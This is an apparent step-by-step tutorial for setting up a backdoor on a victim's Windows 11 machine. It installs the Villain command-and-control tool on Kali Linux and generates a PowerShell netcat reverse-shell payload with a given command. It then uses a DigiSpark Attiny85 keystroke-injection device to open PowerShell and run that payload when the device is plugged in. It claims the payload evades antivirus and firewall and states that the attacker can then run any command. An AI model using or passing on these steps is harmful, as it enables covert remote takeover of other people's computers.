• Kali Linux (attacker’s machine)
• Windows 11 (victim’s machine)
• Villain Tool on Kali Linux
• DigiSpark Attiny85
• Arduino IDE
Install the latest version of Villain manually:
sudo git clone https://github.com/t3l3machus/Villain.git<br>
Install the requirements.txt
cd ./Villain
pip3 install -r requirements.txt
You should also install gnome-terminal
(required for one of the framework's commands):
sudo apt update&&sudo apt install gnome-terminal
Now it is ready to use
As Villain tool is operating, we will use it to generate to generate the required payload for our backdoor.
To generate the payload, write the keyword generate, specify the type of payload you want to generate, then specify the local host and click enter to get the desired payload
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0
• The payload is generated and it’s time to test the payload.
• For testing we are using Windows 11
• Open the PowerShell, paste the payload on shell and click enter
• You can witness that the payload is running successfully and have bypassed the Windows Antivurus and Firewall
• To deploy the payload, we will download the Arduino IDE
• Open the IDE, create a new sketch file and write down the code for Digispark Attiny85.
• The Sketch is then compiled and uploaded on Arduino present in Digispark Attiny85
• Now when the victim inject the Attiny85 in its machine.
• After few seconds, search bar is opens and PowerShell is searched
• It opens the PowerShell, then automatically pastes the payload and click enter to execute it.
• Once the script is executed you can witness that a backdoor session has been established on the Villain terminal on attacker’s machine.
• Now by typing sessions on the Villain terminal, you can see all the possible session that has been established using the payload.
• It contains Session ID, IP Address, OS Type, User, Owner and Status.
Now the backdoor has been created, you can easily execute any command